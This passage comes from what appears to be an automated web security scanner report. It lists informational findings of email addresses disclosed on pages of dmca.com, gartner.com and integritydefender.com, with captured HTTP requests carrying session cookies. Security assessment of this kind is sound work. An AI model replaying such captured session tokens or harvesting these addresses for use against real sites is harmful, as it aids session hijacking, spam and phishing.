...[SNIP]...
27.34. http://www.dmca.com/Protection/Status.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dmca.com
Path:   /Protection/Status.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Protection/Status.aspx?id=6d6905a9-aeec-4426-921a-33dc8d0cdfb9&PAGE_ID=aHR0cDovL3d3dy5yZXB1dGF0aW9uY2hhbmdlci5jb20vc2NoZWR1bGVkLmh0bWw1 HTTP/1.1
Host: www.dmca.com
Proxy-Connection: keep-alive
Referer: http://www.reputationchanger.com/scheduled.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wubflym5pb53bt45ku4n3oa4

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: whoson=521479-61577.4253039; expires=Thu, 23-Jun-2011 23:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 16:06:17 GMT
Content-Length: 14244


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">

<head id="ctl00_mstrHead"><title>
   Reputation Changer | Protected by DMCA Protecti
...[SNIP]...
<h4>This page was translated, if you find any inaccuracies, please let us know at support@dmca.com, thank you </h4>
...[SNIP]...
27.35. http://www.gartner.com/technology/contact/become-a-client.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /technology/contact/become-a-client.jsp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /technology/contact/become-a-client.jsp HTTP/1.1
Host: www.gartner.com
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/technology/contact/contact_gartner.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WebLogicSession=cSYnN1vJnb1Nx84rkvK9h3y2Z1JSqHc4Q7GnchMG2ZDySdxm2Pns!475228577; MKTSESSIONID=2pxxN1kBM49w9XHgl67B0BKnWmRD24ZpTvjK6St3Ncw4TQzX7by2!-1018522061; TS83f541=32d23d3d5a761af07eb8e7078f5d2a8c0621405c7f8621844db564c8; WT_FPC=id=173.193.214.243-1722167968.30147392:lv=1303733487556:ss=1303732853510; UnicaID=EaMj78Ff3mr-W7FK0tG; __utmz=256913437.1303733488.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=256913437.2022865609.1303733488.1303733488.1303733488.1; __utmc=256913437; __utmb=256913437.1.10.1303733488

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: Servlet/2.4 JSP/2.0
Content-type: text/html; charset=ISO-8859-1
Date: Mon, 25 Apr 2011 12:11:27 GMT
ETag: "pvbd35e8d8926582dc26975fcff5279ead"
X-PvInfo: [S10202.C10821.A151087.RA0.G24F28.U277869E6].[OT/html.OG/pages]
Vary: Accept-Encoding
Content-Length: 32000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>


<head>

<title>Become a Client</title>


...[SNIP]...
<input type="hidden" name="recipient" value="sales.lead@gartner.com "><!--sales.lead@gartner.com -->
...[SNIP]...
27.36. http://www.gartner.com/technology/contact/contact_gartner.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /technology/contact/contact_gartner.jsp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /technology/contact/contact_gartner.jsp HTTP/1.1
Host: www.gartner.com
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/DisplayDocument?doc_cd=127481
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WebLogicSession=cSYnN1vJnb1Nx84rkvK9h3y2Z1JSqHc4Q7GnchMG2ZDySdxm2Pns!475228577; TS83f541=32d23d3d5a761af07eb8e7078f5d2a8c0621405c7f8621844db564c8; WT_FPC=id=173.193.214.243-1722167968.30147392:lv=1303733464197:ss=1303732853510

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: MKTSESSIONID=nMx8N1kBgpd2v7XKWLb9qTL1ySyvfknTRk77TT2XbtpNyfyvrwqk!-1168810344; domain=.gartner.com; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Content-type: text/html; charset=ISO-8859-1
Date: Mon, 25 Apr 2011 12:11:14 GMT
ETag: "pv99785f693982e6484f97f558a3076f92"
Cache-Control: no-cache="set-cookie"
X-PvInfo: [S10202.C10821.A151087.RA0.G24F28.U2C9A436D].[OT/html.OG/pages]
Vary: Accept-Encoding
Set-Cookie: TS83f541=32d23d3d5a761af07eb8e7078f5d2a8c0621405c7f8621844db564c8; Path=/
Content-Length: 16560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>


<head>


<!-- Changes to title and meta tags
...[SNIP]...
<a href="mailto:inquiry@gartner.com">inquiry@gartner.com</a>
...[SNIP]...
<a href="mailto:help@gartner.com">help@gartner.com</a>
...[SNIP]...
<a href="mailto:investor.relations@gartner.com">investor.relations@gartner.com</a>
...[SNIP]...
<a href="mailto:info@amstock.com">info@amstock.com</a>
...[SNIP]...
<a href="mailto:ombudsman@gartner.com">ombudsman@gartner.com</a>
...[SNIP]...
<a href="mailto:vendor.briefings@gartner.com">
...[SNIP]...
<a href="mailto:jp.vendorbriefings@gartner.com">
...[SNIP]...
<a href="mailto:privacy.officer@gartner.com">privacy.officer@gartner.com</a>
...[SNIP]...
<a href="mailto:emea.privacyofficer@gartner.com">emea.privacyofficer@gartner.com</a>
...[SNIP]...
<a href="mailto:apac_privacy.officer@gartner.com">apac_privacy.officer@gartner.com</a>
...[SNIP]...
27.37. http://www.instantengage.com/open_chat.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.instantengage.com
Path:   /open_chat.php

Issue detail

The following email address was disclosed in the response:

Request

GET /open_chat.php?Account_ID=1756&Page_ID=2293&Email_To=alan%40integritydefender.com&Email_Subject=Enquires%20for%20Integrity%20Defenders HTTP/1.1
Host: www.instantengage.com
Proxy-Connection: keep-alive
Referer: http://www.integritydefender.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:47:06 GMT
Server: Apache/2.0.50 (Fedora)
X-Powered-By: PHP/4.3.8
P3P: CP="OTI DSP COR PSAa OUR IND COM NAV STA"
Content-Length: 5256
Connection: close
Content-Type: text/html; charset=UTF-8

<html>

<head>

<script language="javascript">
<!--
//InstantEngage Script Template//

//Page Variables - System Generated
var gURL_Server = "www.instantengage.com";
var gSSL_Port = 443;
va
...[SNIP]...
OnlineImageSrc = "http://www.instantengage.com/images/but_smassist.gif";
var OperatorOfflineImageSrc = "http://www.instantengage.com/images/but_smno_operator.gif";
var OperatorOfflineEmailAddress = "alan@integritydefender.com";var OperatorOfflineEmailSubject = "Enquiries for InstantEngage";
var VisitorDefaultName = ""; // The server can actually place the actual Name here
var VisitorDefaultEmail = ""; // The server can a
...[SNIP]...
27.38. http://www.integritydefender.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.integritydefender.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:44:58 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=dc2d6e2ab4b800fc3fe5b92b56c23862; path=/
Content-Type: text/html
Content-Length: 14234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
peratorOnlineImageSrc = "http://www.instantengage.com/images_store/set6_1.gif";
var OperatorOfflineImageSrc = "http://www.instantengage.com/images_store/set6_2.gif";
var OperatorOfflineEmailAddress = "alan@integritydefender.com";
var OperatorOfflineEmailSubject = "Enquires for Integrity Defenders";
//-->
...[SNIP]...
27.39. http://www.integritydefender.com/about.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.integritydefender.com
Path:   /about.php

Issue detail

The following email address was disclosed in the response:

Request

GET /about.php HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
Referer: http://www.integritydefender.com/buyerDetails.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=da4c413fd2f41e463cb4aac35dcd5799

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:47:23 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 13013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
peratorOnlineImageSrc = "http://www.instantengage.com/images_store/set6_1.gif";
var OperatorOfflineImageSrc = "http://www.instantengage.com/images_store/set6_2.gif";
var OperatorOfflineEmailAddress = "alan@integritydefender.com";
var OperatorOfflineEmailSubject = "Enquires for Integrity Defenders";
//-->
...[SNIP]...
27.40. http://www.integritydefender.com/account.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.integritydefender.com
Path:   /account.php

Issue detail

The following email address was disclosed in the response:

Request

GET /account.php HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=da4c413fd2f41e463cb4aac35dcd5799

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:45:58 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 13118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
peratorOnlineImageSrc = "http://www.instantengage.com/images_store/set6_1.gif";
var OperatorOfflineImageSrc = "http://www.instantengage.com/images_store/set6_2.gif";
var OperatorOfflineEmailAddress = "alan@integritydefender.com";
var OperatorOfflineEmailSubject = "Enquires for Integrity Defenders";
//-->
...[SNIP]...
27.41. http://www.integritydefender.com/buyerDetails.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.integritydefender.com
Path:   /buyerDetails.php

Issue detail

The following email addresses were disclosed in the response:

Request

POST /buyerDetails.php HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
Referer: http://www.integritydefender.com/personal.php
Cache-Control: max-age=0
Origin: http://www.integritydefender.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=da4c413fd2f41e463cb4aac35dcd5799
Content-Length: 62

amount=489&item_name=Basic+Personal+Services&page=details&Buy=

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:46:49 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="business.php" class="payments@integritydefender.com">
...[SNIP]...
peratorOnlineImageSrc = "http://www.instantengage.com/images_store/set6_1.gif";
var OperatorOfflineImageSrc = "http://www.instantengage.com/images_store/set6_2.gif";
var OperatorOfflineEmailAddress = "alan@integritydefender.com";
var OperatorOfflineEmailSubject = "Enquires for Integrity Defenders";
//-->
...[SNIP]...
27.42. http://www.integritydefender.com/contact.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.integritydefender.com
Path:   /contact.php

Issue detail

The following email address was disclosed in the response:

Request

GET /contact.php HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
Referer: http://www.integritydefender.com/about.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=da4c413fd2f41e463cb4aac35dcd5799

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:47:24 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 12985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
peratorOnlineImageSrc = "http://www.instantengage.com/images_store/set6_1.gif";
var OperatorOfflineImageSrc = "http://www.instantengage.com/images_store/set6_2.gif";
var OperatorOfflineEmailAddress = "alan@integritydefender.com";
var OperatorOfflineEmailSubject = "Enquires for Integrity Defenders";
//-->
...[SNIP]...
27.43. http://www.integritydefender.com/faq.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.integritydefender.com
Path:   /faq.php

Issue detail

The following email address was disclosed in the response:

Request

GET /faq.php HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=da4c413fd2f41e463cb4aac35dcd5799

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:45:59 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 13364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
peratorOnlineImageSrc = "http://www.instantengage.com/images_store/set6_1.gif";
var OperatorOfflineImageSrc = "http://www.instantengage.com/images_store/set6_2.gif";
var OperatorOfflineEmailAddress = "alan@integritydefender.com";
var OperatorOfflineEmailSubject = "Enquires for Integrity Defenders";
//-->
...[SNIP]...
27.44. http://www.integritydefender.com/js/adminJavaScript.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.integritydefender.com
Path:   /js/adminJavaScript.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/adminJavaScript.js HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
Referer: http://www.integritydefender.com/account.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=da4c413fd2f41e463cb4aac35dcd5799

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:45:58 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 10 Jan 2011 13:33:56 GMT
ETag: "2639b9f-2224-4997e05053900"
Accept-Ranges: bytes
Content-Length: 8740
Content-Type: application/javascript

function isNumberKey(evt) {
var charCode = (evt.which) ? evt.which : event.keyCode
if (charCode > 31 && (charCode < 48 || charCode > 57)) {
alert("Please enter valid in numeric");
return fa
...[SNIP]...
alue==0) {
       alert ("Please enter your Email!");
       f.email.focus();
       return false;
}
   if(f.email.value == "" || f.email.value == " ") {
       alert ("Please enter a valid E-mail addresd.\n" +"Example: name@gmail.com");
       f.email.focus()
       return false;
   } else if(f.email.value.indexOf("@")<1 ||
   f.email.value.indexOf(".")==-1 ||
   f.email.value.indexOf(",")!=-1 ||
   f.email.value.indexOf(" ")!=-1 ||

...[SNIP]...
<6)
    {
       alert("Please enter a valid E-mail addresd.\n" + "Example: name@gmail.com");
        f.email.focus();
        return false;
    }

    if(f.contactNumber.value==0) {
       alert ("Please enter contact number!");
       f.contactNumber.focus();
       return false;
   }
   if (isNaN(f.contactNumber.value
...[SNIP]...
}
   return true;
}
// sign up form validation
function validateUser()
{
   var f = document.userAccount;
   if(f.userEmailId.value == 0) {
       alert ("Please enter a valid E-mail address.\n" +"Example: name@gmail.com");
       f.userEmailId.focus();
       return false;
   } else if(f.userEmailId.value.indexOf("@")<1 ||
        f.userEmailId.value.indexOf(".")==-1 ||
        f.userEmailId.value.indexOf(",")!=-1 ||
        f.u
...[SNIP]...
<6) {
        alert("Please enter a valid E-mail address.\n" + "Example: name@gmail.com");
        f.userEmailId.focus();
        return false;
}
if(f.userPassword.value==0){
       alert("Please enter the password");
       f.userPassword.focus();
       return false;
}
else if(f.use
...[SNIP]...
f.userPhone.focus();
    return false;
   }
   return true;
}
function membership_login()
{
   var f = document.login;
   if(f.email.value == 0) {
       alert ("Please enter a valid E-mail address.\n" +"Example: name@gmail.com");
       f.email.focus();
       return false;
   } else if(f.email.value.indexOf("@")<1 ||
   f.email.value.indexOf(".")==-1 ||
   f.email.value.indexOf(",")!=-1 ||
   f.email.value.indexOf(" ")!=-1 ||

...[SNIP]...
<6)
{
alert("Please enter a valid E-mail address.\n" +
"Example: name@gmail.com");
f.email.focus();
return false;
}
if(f.password.value==0){
       alert("Please enter the password");
       f.password.focus();
       return false;
}
if(f.password.value.length<6){
       alert("Pleas
...[SNIP]...
();
       return false;
}
return true;    
}

function membership_forgotpassword()
{
   var f = document.forgotPassword;
   if(f.email.value == 0) {
       alert ("Please enter a valid E-mail address.\n" +"Example: name@gmail.com");
       f.email.focus();
       return false;
   } else if(f.email.value.indexOf("@")<1 ||
   f.email.value.indexOf(".")==-1 ||
   f.email.value.indexOf(",")!=-1 ||
   f.email.value.indexOf(" ")!=-1 ||

...[SNIP]...
<6)
{
alert("Please enter a valid E-mail address.\n" +
"Example: name@gmail.com");
f.email.focus();
return false;
}
}

function validateLogin() {
   var s = document.userAccountLogin;
   
   if(s.userEmailId.value==0){
   alert('Please enter account email id');
       s.userE
...[SNIP]...
27.45. http://www.integritydefender.com/js/contactUs.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.integritydefender.com
Path:   /js/contactUs.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/contactUs.js HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
Referer: http://www.integritydefender.com/contact.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=da4c413fd2f41e463cb4aac35dcd5799

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:47:24 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 10 Jan 2011 13:33:57 GMT
ETag: "2639b9e-6bf-4997e05147b40"
Accept-Ranges: bytes
Content-Length: 1727
Content-Type: application/javascript

function isNumberKey(evt)
{
var charCode = (evt.which) ? evt.which : event.keyCode
if (charCode > 31 && (charCode < 48 || charCode > 57)) {
alert("Please enter valid in numeric");
return fa
...[SNIP]...
alue==0) {
       alert ("Please enter your Email!");
       f.email.focus();
       return false;
}
   if(f.email.value == "" || f.email.value == " ") {
       alert ("Please enter a valid E-mail addresd.\n" +"Example: name@gmail.com");
       f.email.focus()
       return false;
   } else if(f.email.value.indexOf("@")<1 ||
   f.email.value.indexOf(".")==-1 ||
   f.email.value.indexOf(",")!=-1 ||
   f.email.value.indexOf(" ")!=-1 ||

...[SNIP]...
<6)
    {
       alert("Please enter a valid E-mail addresd.\n" + "Example: name@gmail.com");
        f.email.focus();
        return false;
    }
   
    //if(f.contact.value==0) {
//        alert ("Please enter contact number!");
//        f.contact.focus();
//        return false;
//    }
//    if (isNaN(f.contact.value)=
...[SNIP]...
27.46. http://www.integritydefender.com/personal.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.integritydefender.com
Path:   /personal.php

Issue detail

The following email address was disclosed in the response:

Request

GET /personal.php HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
Referer: http://www.integritydefender.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=da4c413fd2f41e463cb4aac35dcd5799

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:46:47 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 11006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
peratorOnlineImageSrc = "http://www.instantengage.com/images_store/set6_1.gif";
var OperatorOfflineImageSrc = "http://www.instantengage.com/images_store/set6_2.gif";
var OperatorOfflineEmailAddress = "alan@integritydefender.com";
var OperatorOfflineEmailSubject = "Enquires for Integrity Defenders";
//-->
...[SNIP]...
27.47. http://www.integritydefender.com/privacy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.integritydefender.com
Path:   /privacy.php

Issue detail

The following email address was disclosed in the response:

Request

GET /privacy.php HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=da4c413fd2f41e463cb4aac35dcd5799

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:46:02 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 12341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
peratorOnlineImageSrc = "http://www.instantengage.com/images_store/set6_1.gif";
